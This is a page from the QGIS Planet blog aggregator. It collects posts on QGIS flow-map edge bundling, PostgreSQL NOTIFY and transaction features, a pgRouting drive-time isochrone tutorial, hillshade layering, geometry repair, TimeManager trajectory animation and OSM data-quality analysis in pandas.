Page 2 of 36 (714 posts)

  • talks about »
  • qgis

Tags

Last update:
Thu Feb 22 03:05:44 2018

A Django site.

QGIS Planet

Movement data in GIS #8: edge bundling for flow maps

If you follow this blog, you’ll probably remember that I published a QGIS style for flow maps a while ago. The example showed domestic migration between the nine Austrian states, a rather small dataset. Even so, it required some manual tweaking to make the flow map readable. Even with only 72 edges, the map quickly gets messy:

Raw migration flows between Austrian states, line width scaled by flow strength

One popular approach in the data viz community to deal with this problem is edge bundling. The idea is to reduce visual clutter by generate bundles of similar edges. 

Surprisingly, edge bundling is not available in desktop GIS. Existing implementations in the visual analytics field often run on GPUs because edge bundling is computationally expensive. Nonetheless, we have set out to implement force-directed edge bundling for the QGIS Processing toolbox [0]. The resulting scripts are available at https://github.com/dts-ait/qgis-edge-bundling.

The main procedure consists of two tools: bundle edges and summarize. Bundle edges takes the raw straight lines, and incrementally adds intermediate nodes (called control points) and shifts them according to computed spring and electrostatic forces. If the input are 72 lines, the output again are 72 lines but each line geometry has been bent so that similar lines overlap and form a bundle.

After this edge bundling step, most common implementations compute a line heatmap, that is, for each map pixel, determine the number of lines passing through the pixel. But QGIS does not support line heatmaps and this approach also has issues distinguishing lines that run in opposite directions. We have therefore implemented a summarize tool that computes the local strength of the generated bundles.

Continuing our previous example, if the input are 72 lines, summarize breaks each line into its individual segments and determines the number of segments from other lines that are part of the same bundle. If a weight field is specified, each line is not just counted once but according to its weight value. The resulting bundle strength can be used to create a line layer style with data-defined line width:

Bundled migration flows

To avoid overlaps of flows in opposing directions, we define a line offset. Finally, summarize also adds a sequence number to the line segments. This sequence number is used to assign a line color on the gradient that indicates flow direction.

I already mentioned that edge bundling is computationally expensive. One reason is that we need to perform pairwise comparison of edges to determine if they are similar and should be bundled. This comparison results in a compatibility matrix and depending on the defined compatibility threshold, different bundles can be generated.

The following U.S. dataset contains around 4000 lines and bundling it takes a considerable amount of time.

One approach to speed up computations is to first use a quick clustering algorithm and then perform edge bundling on each cluster individually. If done correctly, clustering significantly reduces the size of each compatibility matrix.

In this example, we divided the edges into six clusters before bundling them. If you compare this result to the visualization at the top of this post (which did not use clustering), you’ll see some differences here and there but, overall, the results are quite similar:

Looking at these examples, you’ll probably spot a couple of issues. There are many additional ideas for potential improvements from existing literature which we have not implemented yet. If you are interested in improving these tools, please go ahead! The code and more examples are available on Github.

For more details, leave your email in a comment below and I’ll gladly send you the pre-print of our paper.

[0] Graser, A., Schmidt, J., Roth, F., & Brändle, N. (2017 online) Untangling Origin-Destination Flows in Geographic Information Systems. Information Visualization – Special Issue on Visual Movement Analytics.


Read more:

Oslandia is baking some awesome QGIS 3 new features

QGIS 3.0 is now getting closer and closer, it’s the right moment to write about some major refactor and new features we have been baking at Oslandia.

A quick word about the release calendar, you probably felt like QGIS 3 freeze was expected for the end of August, didn’t you?

In fact, we have so many new major changes in the queue that the steering committee (PSC), advised by the core developers, decided to push twice the release date up up to the 27 of October. Release date has not be been pushed (yet).

At Oslandia we got involved in a dark list of hidden features of QGIS3.

They mostly aren’t easy to advertised visually, but you’ll appreciate them for sure!

  • Add  capabilities to store data in the project
    • add a new .qgz zipped file format container
    • have editable joins, with upsert capabilities (Insert Or Update)
    • Transparently store  and maintain in sync data in a sqlite database. Now custom labeling is pretty easy!
  • Coordinating work and tests on new node tool for data editing
  • Improving Z / m handling in edit tools and layer creation dialogs
  • Ticket reviewing and cleaning

Next articles will describe some of those tasks soon.

This work was a great opportunity to ramp up a new talented developer with commit rights on the repository! Welcome and congratulations to Paul our new core committer !

All this was possible with the support of many actors, but also thanks to the fundings of QGIS.org via Grant Applications or direct funding of QGIS server!

A last word, please help us in testing QGIS3, it’s the perfect moment to stress it, bugfix period is about to start !

 

 

 

Refresh your maps FROM postgreSQL !

Continuing our love story with PostgreSQL and QGIS, we asked QGIS.org a grant application during early 2017 spring.

The idea was to take benefit of very advanced PostgreSQL features, that probably never were used in a Desktop GIS client before.

Today, let’s see what we can do with the PostgreSQL NOTIFY feature!

Ever dreamt of being able to trigger things from outside QGIS? Ever wanted a magic stick to trigger actions in some clients from a database action?

X All The Y Meme | REFRESH QGIS FROM THE DATABASE !!! | image tagged in memes,x all the y | made w/ Imgflip meme maker

 

NOTIFY is a PostgreSQL specific feature allowing to generate notifications on a channel and optionally send a message — a payload in PG’s dialect .

In short, from within a transaction, we can raise a signal in a PostgreSQL queue and listen to it from a client.

In action

We hardcoded a channel named “qgis” and made QGIS able to LISTEN to NOTIFY events and transform them into Qt’s signals. The signals are connected to layer refresh when you switch on this rendering option.

Optionnally, adding a message filter will only redraw the layer for some specific events.

This mechanism is really versatile and we now can imagine many possibilities, maybe like trigger a notification message to your users from the database, interact with plugins, or even code a chat between users of the same database  (ok, this is stupid) !

 

More than just refresh layers?

The first implementation we chose was to trigger a layer refresh because we believe this is a good way for users to discover this new feature.

But QGIS rocks hey, doing crazy things for limited uses is not the way.

Thanks to feedback on the Pull Request, we added the possibility to trigger layer actions on notification.

That should be pretty versatile since you can do almost anything with those actions now.

Caveats

QGIS will open a permanent connection to PostgreSQL to watch the notify signals. Please keep that in mind if you have several clients and a limited number of connections.

Notify signals are only transmitted with the transaction, so when the COMMIT is raised. So be aware that this might not help you if users are inside an edit session.

QGIS has a lot of different caches, for attribute table for instance. We currently have no specific way to invalidate a specific cache, and then order QGIS to refresh it’s attribute table.

There is no way in PG to list all channels of a database session, that’s why we couldn’t propose a combobox list of available signals in the renderer option dialog. Anyway, to avoid too many issues, we decided to hardcode the channel name in QGIS with the name “qgis”. If this is somehow not enough for your needs, please contact us!

Conclusion

The github pull request is here : https://github.com/qgis/QGIS/pull/5179

We are convinced this would be really useful for real time application, let us know if that makes some bells ring on your side!

More to come soon, stay tuned!

 

 

Undo Redo stack is back QGIS Transaction groups

Let’s keep on looking at what we did in QGIS.org grant application of early 2017 spring.

At Oslandia, we use a lot the transaction groups option of QGIS. It was an experimental feature in QGIS 2.X allowing to open only one common Postgres transaction for all layers sharing the same connection string.

Transaction group option

When activated, that option will bring many killer features:

  • Users can switch all the layers in edit mode at once. A real time saver.
  • Every INSERT, UPDATE or DELETE is forwarded immediately to the database, which is nice for:
    • Evaluating on the fly if database constraints are satisfied or not. Without transaction groups this is only done when saving the edits and this can be frustrating to create dozens of features and having one of them rejected because of a foreign key constraint…
    • Having triggers evaluated on the fly.  QGIS is so powerful when dealing with “thick database” concepts that I would never go back to a pure GIS ignoring how powerful databases can be !
    • Playing with QgsTransaction.ExecuteSQL allows to trigger stored procedures in PostgreSQL in a beautiful API style interface. Something like
SELECT invert_pipe_direction('pipe1');
  • However, the implementation was flagged “experimental” because some caveats where still causing issues:
    • Committing on the fly was breaking the logic of the undo/redo stack. So there was no way to do a local edit. No Ctrl+Z!  The only way to rollback was to stop the edit session and loose all the work. Ouch.. Bad!
    • Playing with ExecuteSQL did not dirty the QGIS edit buffer. So, if during an edit session no edit action was made using QGIS native tools, there was no clean way to activate the “save edits” icon.
    • When having some failures in the triggers, QGIS may loose DB connection and thus create a silent ROLLBACK.

We decided to try to restore the undo/redo stack by saving the history edits in PostgreSQL SAVEPOINTS and see if we could restore the original feature in QGIS.

And.. it worked!

Let’s see that in action:

 

Potential caveats ?

At start, we worried about how heavy all those savepoints would be for the database. It turns out that maybe for really massive geometries, and heavy editing sessions, this could start to weight a bit, but honestly far away from PostgreSQL capabilities.

 

Up to now, we didn’t really find any issue with that..

And we didn’t address the silent ROLLBACK that occurs sometimes, because it is generated by buggy stored procedures, easy to solve.

Some new ideas came to us when working in that area. For instance, if a transaction locks a feature, QGIS just… wait for the lock to be released. I think we should find a way to advertise those locks to the users, that would be great! If you’re interested in making that happen, please contact us.

 

More to come soon, stay tuned!

 

 

Cours PyQGIS 13.11./14.11.2017 à Neuchâtel

Le cours est complet. Le cours est destiné aux utilisateurs avancés de QGIS qui souhaitent accroître leurs possibilités grâce à l’utilisation de python dans QGIS. Lors de cette formation, nous aborderons différentes possibilités d’interaction avec l’API QGIS ainsi que la

Drive-time Isochrones from a single Shapefile using QGIS, PostGIS, and Pgrouting

This is a guest post by Chris Kohler .

Introduction:

This guide provides step-by-step instructions to produce drive-time isochrones using a single vector shapefile. The method described here involves building a routing network using a single vector shapefile of your roads data within a Virtual Box. Furthermore, the network is built by creating start and end nodes (source and target nodes) on each road segment. We will use Postgresql, with PostGIS and Pgrouting extensions, as our database. Please consider this type of routing to be fair, regarding accuracy, as the routing algorithms are based off the nodes locations and not specific addresses. I am currently working on an improved workflow to have site address points serve as nodes to optimize results. One of the many benefits of this workflow is no financial cost to produce (outside collecting your roads data). I will provide instructions for creating, and using your virtual machine within this guide.

Steps:–Getting Virtual Box(begin)–

Intro 1. Download/Install Oracle VM(https://www.virtualbox.org/wiki/Downloads)

Intro 2. Start the download/install OSGeo-Live 11(https://live.osgeo.org/en/overview/overview.html).

Pictures used in this workflow will show 10.5, though version 11 can be applied similarly. Make sure you download the version: osgeo-live-11-amd64.iso. If you have trouble finding it, here is the direct link to the download (https://sourceforge.net/projects/osgeo-live/files/10.5/osgeo-live-10.5-amd64.iso/download)
Intro 3. Ready for virtual machine creation: We will utilize the downloaded OSGeo-Live 11 suite with a virtual machine we create to begin our workflow. The steps to create your virtual machine are listed below. Also, here are steps from an earlier workshop with additional details with setting up your virtual machine with osgeo live(http://workshop.pgrouting.org/2.2.10/en/chapters/installation.html).

1.  Create Virutal Machine: In this step we begin creating the virtual machine housing our database.

Open Oracle VM VirtualBox Manager and select “New” located at the top left of the window.

VBstep1

Then fill out name, operating system, memory, etc. to create your first VM.

vbstep1.2

2. Add IDE Controller:  The purpose of this step is to create a placeholder for the osgeo 11 suite to be implemented. In the virtual box main window, right-click your newly-created vm and open the settings.

vbstep2

In the settings window, on the left side select the storage tab.

Find “adds new storage controller button located at the bottom of the tab. Be careful of other buttons labeled “adds new storage attachment”! Select “adds new storage controller button and a drop-down menu will appear. From the top of the drop-down select “Add IDE Controller”.

vbstep2.2

vbstep2.3

You will see a new item appear in the center of the window under the “Storage Tree”.

3.  Add Optical Drive: The osgeo 11 suite will be implemented into the virtual machine via an optical drive. Highlight the new controller IDE you created and select “add optical drive”.

vbstep3

A new window will pop-up and select “Choose Disk”.

vbstep3.2

Locate your downloaded file “osgeo-live 11 amd64.iso” and click open. A new object should appear in the middle window under your new controller displaying “osgeo-live-11.0-amd64.iso”.

vbstep3.3

Finally your virtual machine is ready for use.
Start your new Virtual Box, then wait and follow the onscreen prompts to begin using your virtual machine.

vbstep3.4

–Getting Virtual Box(end)—

4. Creating the routing database, and both extensions (postgis, pgrouting): The database we create and both extensions we add will provide the functions capable of producing isochrones.

To begin, start by opening the command line tool (hold control+left-alt+T) then log in to postgresql by typing “psql -U user;” into the command line and then press Enter. For the purpose of clear instruction I will refer to database name in this guide as “routing”, feel free to choose your own database name. Please input the command, seen in the figure below, to create the database:

CREATE DATABASE routing;

You can use “\c routing” to connect to the database after creation.

step4

The next step after creating and connecting to your new database is to create both extensions. I find it easier to take two-birds-with-one-stone typing “psql -U user routing;” this will simultaneously log you into postgresql and your routing database.

When your logged into your database, apply the commands below to add both extensions

CREATE EXTENSION postgis;
CREATE EXTENSION pgrouting;

step4.2

step4.3

5. Load shapefile to database: In this next step, the shapefile of your roads data must be placed into your virtual machine and further into your database.

My method is using email to send myself the roads shapefile then download and copy it from within my virtual machines web browser. From the desktop of your Virtual Machine, open the folder named “Databases” and select the application “shape2pgsql”.

step5

Follow the UI of shp2pgsql to connect to your routing database you created in Step 4.

step5.2

Next, select “Add File” and find your roads shapefile (in this guide we will call our shapefile “roads_table”) you want to use for your isochrones and click Open.

step5.3

Finally, click “Import” to place your shapefile into your routing database.

6. Add source & target columns: The purpose of this step is to create columns which will serve as placeholders for our nodes data we create later.

There are multiple ways to add these columns into the roads_table. The most important part of this step is which table you choose to edit, the names of the columns you create, and the format of the columns. Take time to ensure the source & target columns are integer format. Below are the commands used in your command line for these functions.

ALTER TABLE roads_table ADD COLUMN "source" integer;
ALTER TABLE roads_table ADD COLUMN "target" integer;

step6

step6.2

7. Create topology: Next, we will use a function to attach a node to each end of every road segment in the roads_table. The function in this step will create these nodes. These newly-created nodes will be stored in the source and target columns we created earlier in step 6.

As well as creating nodes, this function will also create a new table which will contain all these nodes. The suffix “_vertices_pgr” is added to the name of your shapefile to create this new table. For example, using our guide’s shapefile name , “roads_table”, the nodes table will be named accordingly: roads_table_vertices_pgr. However, we will not use the new table created from this function (roads_table_vertices_pgr). Below is the function, and a second simplified version, to be used in the command line for populating our source and target columns, in other words creating our network topology. Note the input format, the “geom” column in my case was called “the_geom” within my shapefile:

pgr_createTopology('roads_table', 0.001, 'geom', 'id',
 'source', 'target', rows_where := 'true', clean := f)

step7

Here is a direct link for more information on this function: http://docs.pgrouting.org/2.3/en/src/topology/doc/pgr_createTopology.html#pgr-create-topology

Below is an example(simplified) function for my roads shapefile:

SELECT pgr_createTopology('roads_table', 0.001, 'the_geom', 'id')

8. Create a second nodes table: A second nodes table will be created for later use. This second node table will contain the node data generated from pgr_createtopology function and be named “node”. Below is the command function for this process. Fill in your appropriate source and target fields following the manner seen in the command below, as well as your shapefile name.

To begin, find the folder on the Virtual Machines desktop named “Databases” and open the program “pgAdmin lll” located within.

step8

Connect to your routing database in pgAdmin window. Then highlight your routing database, and find “SQL” tool at the top of the pgAdmin window. The tool resembles a small magnifying glass.

step8.2

We input the below function into the SQL window of pgAdmin. Feel free to refer to this link for further information: (https://anitagraser.com/2011/02/07/a-beginners-guide-to-pgrouting/)

CREATE TABLE node AS
   SELECT row_number() OVER (ORDER BY foo.p)::integer AS id,
          foo.p AS the_geom
   FROM (     
      SELECT DISTINCT roads_table.source AS p FROM roads_table
      UNION
      SELECT DISTINCT roads_table.target AS p FROM roads_table
   ) foo
   GROUP BY foo.p;

step8.3

  1.  Create a routable network: After creating the second node table from step 8,  we will combine this node table(node) with our shapefile(roads_table) into one, new, table(network) that will be used as the routing network. This table will be called “network” and will be capable of processing routing queries.  Please input this command and execute in SQL pgAdmin tool as we did in step 8. Here is a reference for more information:(https://anitagraser.com/2011/02/07/a-beginners-guide-to-pgrouting/)   

step8.2

 

CREATE TABLE network AS
   SELECT a.*, b.id as start_id, c.id as end_id
   FROM roads_table AS a
      JOIN node AS b ON a.source = b.the_geom
      JOIN node AS c ON a.target = c.the_geom;

step9.2

10. Create a “noded” view of the network:  This new view will later be used to calculate the visual isochrones in later steps. Input this command and execute in SQL pgAdmin tool.

CREATE OR REPLACE VIEW network_nodes AS 
SELECT foo.id,
 st_centroid(st_collect(foo.pt)) AS geom 
FROM ( 
  SELECT network.source AS id,
         st_geometryn (st_multi(network.geom),1) AS pt 
  FROM network
  UNION 
  SELECT network.target AS id, 
         st_boundary(st_multi(network.geom)) AS pt 
  FROM network) foo 
GROUP BY foo.id;

step10

11.​ Add column for speed:​ This step may, or may not, apply if your original shapefile contained a field of values for road speeds.

In reality a network of roads will typically contain multiple speed limits. The shapefile you choose may have a speed field, otherwise the discrimination for the following steps will not allow varying speeds to be applied to your routing network respectfully.

If values of speed exists in your shapefile we will implement these values into a new field, “traveltime“, that will show rate of travel for every road segment in our network based off their geometry. Firstly, we will need to create a column to store individual traveling speeds. The name of our column will be “traveltime” using the format: ​double precision.​ Input this command and execute in the command line tool as seen below.

ALTER TABLE network ADD COLUMN traveltime double precision;

step11

Next, we will populate the new column “traveltime” by calculating traveling speeds using an equation. This equation will take each road segments geometry(shape_leng) and divide by the rate of travel(either mph or kph). The sample command I’m using below utilizes mph as the rate while our geometry(shape_leng) units for my roads_table is in feet​. If you are using either mph or kph, input this command and execute in SQL pgAdmin tool. Below further details explain the variable “X”.

UPDATE network SET traveltime = shape_leng / X*60

step11.2

How to find X​, ​here is an example​: Using example 30 mph as rate. To find X, we convert 30 miles to feet, we know 5280 ft = 1 mile, so we multiply 30 by 5280 and this gives us 158400 ft. Our rate has been converted from 30 miles per hour to 158400 feet per hour. For a rate of 30 mph, our equation for the field “traveltime”  equates to “shape_leng / 158400*60″. To discriminate this calculations output, we will insert additional details such as “where speed = 30;”. What this additional detail does is apply our calculated output to features with a “30” value in our “speed” field. Note: your “speed” field may be named differently.

UPDATE network SET traveltime = shape_leng / 158400*60 where speed = 30;

Repeat this step for each speed value in your shapefile examples:

UPDATE network SET traveltime = shape_leng / X*60 where speed = 45;
UPDATE network SET traveltime = shape_leng / X*60 where speed = 55;

The back end is done. Great Job!

Our next step will be visualizing our data in QGIS. Open and connect QGIS to your routing database by right-clicking “PostGIS” in the Browser Panel within QGIS main window. Confirm the checkbox “Also list tables with no geometry” is checked to allow you to see the interior of your database more clearly. Fill out the name or your routing database and click “OK”.

If done correctly, from QGIS you will have access to tables and views created in your routing database. Feel free to visualize your network by drag-and-drop the network table into your QGIS Layers Panel. From here you can use the identify tool to select each road segment, and see the source and target nodes contained within that road segment. The node you choose will be used in the next step to create the views of drive-time.

12.Create views​: In this step, we create views from a function designed to determine the travel time cost. Transforming these views with tools will visualize the travel time costs as isochrones.

The command below will be how you start querying your database to create drive-time isochrones. Begin in QGIS by draging your network table into the contents. The visual will show your network as vector(lines). Simply select the road segment closest to your point of interest you would like to build your isochrone around. Then identify the road segment using the identify tool and locate the source and target fields.

step12

step12.2

Place the source or target field value in the below command where you see ​VALUE​, in all caps​.

This will serve you now as an isochrone catchment function for this workflow. Please feel free to use this command repeatedly for creating new isochrones by substituting the source value. Please input this command and execute in SQL pgAdmin tool.

*AT THE BOTTOM OF THIS WORKFLOW I PROVIDED AN EXAMPLE USING SOURCE VALUE “2022”

CREATE OR REPLACE VIEW "​view_name" AS 
SELECT di.seq, 
       di.id1, 
       di.id2, 
       di.cost, 
       pt.id, 
       pt.geom 
FROM pgr_drivingdistance('SELECT
     gid::integer AS id, 
     Source::integer AS source, 
     Target::integer AS target,                                    
     Traveltime::double precision AS cost 
       FROM network'::text, ​VALUE::bigint, 
    100000::double precision, false, false)
    di(seq, id1, id2, cost)
JOIN network_nodes pt ON di.id1 = pt.id;

step12.3

13.Visualize Isochrone: Applying tools to the view will allow us to adjust the visual aspect to a more suitable isochrone overlay.

​After creating your view, a new item in your routing database is created, using the “view_name” you chose. Drag-and-drop this item into your QGIS LayersPanel. You will see lots of small dots which represent the nodes.

In the figure below, I named my view “take1“.

step13

Each node you see contains a drive-time value, “cost”, which represents the time used to travel from the node you input in step 12’s function.

step13.2

Start by installing the QGIS plug-in Interpolation” by opening the Plugin Manager in QGIS interface.

step13.3

Next, at the top of QGIS window select “Raster” and a drop-down will appear, select “Interpolation”.

step13.4

 

A new window pops up and asks you for input.

step13.5

Select your “​view”​ as the​ vector layer​, select ​”cost​” as your ​interpolation attribute​, and then click “Add”.

step13.6

A new vector layer will show up in the bottom of the window, take care the type is Points. For output, on the other half of the window, keep the interpolation method as “TIN”, edit the ​output file​ location and name. Check the box “​Add result to project​”.

Note: decreasing the cellsize of X and Y will increase the resolution but at the cost of performance.

Click “OK” on the bottom right of the window.

step13.7

A black and white raster will appear in QGIS, also in the Layers Panel a new item was created.

step13.8

Take some time to visualize the raster by coloring and adjusting values in symbology until you are comfortable with the look.

step13.9

step13.10

14. ​Create contours of our isochrone:​ Contours can be calculated from the isochrone as well.

Find near the top of QGIS window, open the “Raster” menu drop-down and select Extraction → Contour.

step14

Fill out the appropriate interval between contour lines but leave the check box “Attribute name” unchecked. Click “OK”.

step14.2

step14.3

15.​ Zip and Share:​ Find where you saved your TIN and contours, compress them in a zip folder by highlighting them both and right-click to select “compress”. Email the compressed folder to yourself to export out of your virtual machine.

Example Isochrone catchment for this workflow:

CREATE OR REPLACE VIEW "2022" AS 
SELECT di.seq, Di.id1, Di.id2, Di.cost,                           
       Pt.id, Pt.geom 
FROM pgr_drivingdistance('SELECT gid::integer AS id,                                       
     Source::integer AS source, Target::integer AS target, 
     Traveltime::double precision AS cost FROM network'::text, 
     2022::bigint, 100000::double precision, false, false) 
   di(seq, id1, id2, cost) 
JOIN netowrk_nodes pt 
ON di.id1 = pt.id;

References: Virtual Box ORACLE VM, OSGeo-Live 11  amd64 iso, Workshop FOSS4G Bonn(​http://workshop.pgrouting.org/2.2.10/en/index.html​),

Adding ESRI’s World Hillshade layer to QGIS

You may have seen my earlier tutorial where I described how to make nice looking hillshaded maps in QGIS using SRTM elevation data. Well, we don’t have to stop with just one hillshade layer on a map, it is possible to overlay multiple hillshades; a procedure that can increase the visual quality and detail. The following image is the hillshade we made before. Once you re-create a hillshade, following the previous tutorial, you can head to the next step (note that brightness and contrast settings may be different due to changes in how QGIS generates and displays hillshades).

We can improve the SRTM hillshade further by adding ESRI’s World Hillshade layer, which uses multi-directional illumination (also called a Swiss Hillshade in tribute to the celebrated Swiss cartographer Eduard Imhof). In addition, World Hillshade has a much higher resolution than SRTM 30m data in some regions of the world, it is 2m for most of the England and Wales, 10m for most of the US, 5m for Spain and 3m for Holland etc. The only drawback is that the style of this layer is somewhat controversial, some love it, some hate it, it looks like it’s illuminated from above, but mixing it with the SRTM hillshade obviates some of it criticised flaws.

To add the World Hillshade layer in QGIS go to the Layer Menu – Add Layer – Add ArcGIS MapServer Layer – click New and add the following URL:

https://services.arcgisonline.com/arcgis/rest/services/Elevation/World_Hillshade/MapServer

Notice QGIS 2.18 no longer needs a plugin to add ESRI layers, it new has this functionality built in. Also, open the url in a browser such as Firefox, it brings up a webpage that describes the layer. We also see links to other other layers. Yes, they can all be added to QGIS by simply taking the URL of the webpage that describe the layer and connecting to it via the ArcGIS MapServer Layer connector.

Name the layer World Hillshade and click Connect, then click and highlight the layer it connects to. Finally, click the Add button to add the layer to the canvas.

Next, we need to adjust the properties of the World Hillshade layer to properly overlay it above the SRTM hillshade layer. Make sure the World hillshade layer is the topmost layer. In the Layers Panel, right click Layer properties and in the window that opens up, click Style (if not visible). Next, change the Layer Blending mode (under color rendering) to Overlay. Adjust the layer’s brightness to around -20 and leave contrast at 0. If you find the scene is still too dark, brighten the SRTM Hillshade by increasing the layer’s brightness. You may also have to change (lower) the Min value of the Min – Max value boxes. Leave the contrast at 0 for the SRTM hillshade. Also, don’t brighten it too much as it might become washed out, loose detail, especially in bright areas. Play around the controls, settings may vary depending on the SRTM data you download and the version of QGIS you use.

Here’s a comparison in Ireland, a ring like structure of hills with a central peak. No, it’s not a meteorite crater. It’s a different kind of geological marvel, the Slieve Gullion Complex and its ring dyke; the deeply eroded remains of a 410 million year old Caledonian volcano. The SRTM hillshade is on the left and World Hillshade + SRTM hillshade is on the right (click on the image, it’s best appreciated full size):

We can see the World Hillshade + SRTM Hillshade layer shows much finer detail. We see a parallel array of roughly north-south orientated lines, these are fractures and faults that cut the Slieve Gullion Complex that were perhaps enhanced by glacial erosion. Also, look carefully, there seems to be some roads meandering across the landscape (hint, bottom of the map and right of the scale bar). You should get even better results with higher resolution World Hillshade data. We also notice that bending SRTM derived hillshade with World Hillshade adds a naturalistic illumination not apparent in multi-directional hillshading. So we have the best of both worlds, a high resolution hillshade and realistic looking illumination.

Hope you found this tutorial helpful.

References:

Baxter, S., 2008. A Geological Field Guide to Cooley Gullion, Mourne & Slieve Croob [pdf]. Geological Survey of Ireland, Dublin. p. 43-53.

Imhof, E. 1982. Cartographic Relief Presentation. Walter de Gruyter GmbH & Co KG.

Fixing invalid polygon geometries

Invalid geometries can cause a lot of headache: from missing features to odd analysis results.

This post aims to illustrate one of the most common issues and presents an approach that can help with these errors.

The dataset used for this example is the Alaska Shapefile from the QGIS sample data:

This dataset has a couple of issues. One way to find out if a dataset contains errors is the Check Validity tool in the Processing toolbox:

If there are errors, a layer called Error output will be loaded. In our case, there are multiple issues:

If we try to use this dataset for spatial analysis, there will likely be errors. For example, using the Fixed distance buffer tool results in missing features:

Note the errors in the Processing log message panel:

Feature ### has invalid geometry. Skipping ...

So what can we do?

In my experience, GRASS can work wonders for fixing these kind of issues. The idea is to run v.buffer.distance with the distance set to zero:

This will import the dataset into GRASS and run the buffer algorithm without actually growing the polygons. Finally, it should export a fixed version of the geometries:

A quick validity check with the Check validity tool confirms that there are no issues left.

 

Visualizing 3D data with expressions

How to visualize point data with Z values? Let’s say: we have data about noise pollution in multi-storey buildings. The point data (apartments) looks like this: The attribute table looks like this: We see X and Y coordinates, and a Z (height) value. The DB column gives the actual noise data, which we want to … Continue reading Visualizing 3D data with expressions

Movement data in GIS #7: animated trajectories with TimeManager

In this post, we use TimeManager to visualize the position of a moving object over time along a trajectory. This is another example of what is possible thanks to QGIS’ geometry generator feature. The result can look like this:

What makes this approach interesting is that the trajectory is stored in PostGIS as a LinestringM instead of storing individual trajectory points. So there is only one line feature loaded in QGIS:

(In part 2 of this series, we already saw how a geometry generator can be used to visualize speed along a trajectory.)

The layer is added to TimeManager using t_start and t_end attributes to define the trajectory’s temporal extent.

TimeManager exposes an animation_datetime() function which returns the current animation timestamp, that is, the timestamp that is also displayed in the TimeManager dock, as well as on the map (if we don’t explicitly disable this option).

Once TimeManager is set up, we can edit the line style to add a point marker to visualize the position of the moving object at the current animation timestamp. To do that, we interpolate the position along the trajectory segments. The first geometry generator expression splits the trajectory in its segments:

The second geometry generator expression interpolates the position on the segment that contains the current TimeManager animation time:

The WHEN statement compares the trajectory segment’s start and end times to the current TimeManager animation time. Afterwards, the line_interpolate_point function is used to draw the point marker at the correct position along the segment:

CASE 
WHEN (
m(end_point(geometry_n($geometry,@geometry_part_num)))
> second(age(animation_datetime(),to_datetime('1970-01-01 00:00')))
AND
m(start_point(geometry_n($geometry,@geometry_part_num)))
<= second(age(animation_datetime(),to_datetime('1970-01-01 00:00')))
)
THEN
line_interpolate_point( 
  geometry_n($geometry,@geometry_part_num),
  1.0 * (
    second(age(animation_datetime(),to_datetime('1970-01-01 00:00')))
	- m(start_point(geometry_n($geometry,@geometry_part_num)))
  ) / (
    m(end_point(geometry_n($geometry,@geometry_part_num)))
	- m(start_point(geometry_n($geometry,@geometry_part_num)))
  ) 
  * length(geometry_n($geometry,@geometry_part_num))
)
END

Here is the animation result for a part of the trajectory between 08:00 and 09:00:


Read more:


OSM data quality assessment: producing map to illustrate data quality

At Oslandia, we like working with Open Source tool projects and handling Open (geospatial) Data. In this article series, we will play with the OpenStreetMap (OSM) map and subsequent data. Here comes the eighth article of this series, dedicated to the OSM data quality evaluation, through production of new maps.

1 Description of OSM element

 1.1 Element metadata extraction

As mentionned in a previous article dedicated to metadata extraction, we have to focus on element metadata itself if we want to produce valuable information about quality. The first questions to answer here are straightforward: what is an OSM element? and how to extract its associated metadata?. This part is relatively similar to the job already done with users.

We know from previous analysis that an element is created during a changeset by a given contributor, may be modified several times by whoever, and may be deleted as well. This kind of object may be either a “node”, a “way” or a “relation”. We also know that there may be a set of different tags associated with the element. Of course the list of every operations associated to each element is recorded in the OSM data history. Let’s consider data around Bordeaux, as in previous blog posts:

import pandas as pd
elements = pd.read_table('../src/data/output-extracts/bordeaux-metropole/bordeaux-metropole-elements.csv', parse_dates=['ts'], index_col=0, sep=",")
elements.head().T
   elem        id  version  visible         ts    uid  chgset
0  node  21457126        2    False 2008-01-17  24281  653744
1  node  21457126        3    False 2008-01-17  24281  653744
2  node  21457126        4    False 2008-01-17  24281  653744
3  node  21457126        5    False 2008-01-17  24281  653744
4  node  21457126        6    False 2008-01-17  24281  653744

This short description helps us to identify some basic features, which are built in the following snippets. First we recover the temporal features:

elem_md = (elements.groupby(['elem', 'id'])['ts']
            .agg(["min", "max"])
            .reset_index())
elem_md.columns = ['elem', 'id', 'first_at', 'last_at']
elem_md['lifespan'] = (elem_md.last_at - elem_md.first_at)/pd.Timedelta('1D')
extraction_date = elements.ts.max()
elem_md['n_days_since_creation'] = ((extraction_date - elem_md.first_at)
                                  / pd.Timedelta('1d'))
elem_md['n_days_of_activity'] = (elements
                              .groupby(['elem', 'id'])['ts']
                              .nunique()
                              .reset_index())['ts']
elem_md = elem_md.sort_values(by=['first_at'])
                                    213418
elem                                  node
id                               922827508
first_at               2010-09-23 00:00:00
last_at                2010-09-23 00:00:00
lifespan                                 0
n_days_since_creation                 2341
n_days_of_activity                       1

Then the remainder of the variables, e.g. how many versions, contributors, changesets per elements:

    elem_md['version'] = (elements.groupby(['elem','id'])['version']
                          .max()
                          .reset_index())['version']
    elem_md['n_chgset'] = (elements.groupby(['elem', 'id'])['chgset']
                           .nunique()
                           .reset_index())['chgset']
    elem_md['n_user'] = (elements.groupby(['elem', 'id'])['uid']
                         .nunique()
                         .reset_index())['uid']
    osmelem_last_user = (elements
                         .groupby(['elem','id'])['uid']
                         .last()
                         .reset_index())
    osmelem_last_user = osmelem_last_user.rename(columns={'uid':'last_uid'})
    elements = pd.merge(elements, osmelem_last_user,
                       on=['elem', 'id'])
    elem_md = pd.merge(elem_md,
                       elements[['elem', 'id', 'version', 'visible', 'last_uid']],
                       on=['elem', 'id', 'version'])
    elem_md = elem_md.set_index(['elem', 'id'])
    elem_md.sample().T
elem                                  node
id                              1340445266
first_at               2011-06-26 00:00:00
last_at                2011-06-27 00:00:00
lifespan                                 1
n_days_since_creation                 2065
n_days_of_activity                       2
version                                  2
n_chgset                                 2
n_user                                   1
visible                              False
last_uid                            354363

As an illustration we have above an old two-versionned node, no more visible on the OSM website.

1.2 Characterize OSM elements with user classification

This set of features is only descriptive, we have to add more information to be able to characterize OSM data quality. That is the moment to exploit the user classification produced in the last blog post!

As a recall, we hypothesized that clustering the users permits to evaluate their trustworthiness as OSM contributors. They are either beginners, or intermediate users, or even OSM experts, according to previous classification.

Each OSM entity may have received one or more contributions by users of each group. Let’s say the entity quality is good if its last contributor is experienced. That leads us to classify the OSM entities themselves in return!

How to include this information into element metadata?

We first need to recover the results of our clustering process.

user_groups = pd.read_hdf("../src/data/output-extracts/bordeaux-metropole/bordeaux-metropole-user-kmeans.h5", "/individuals")
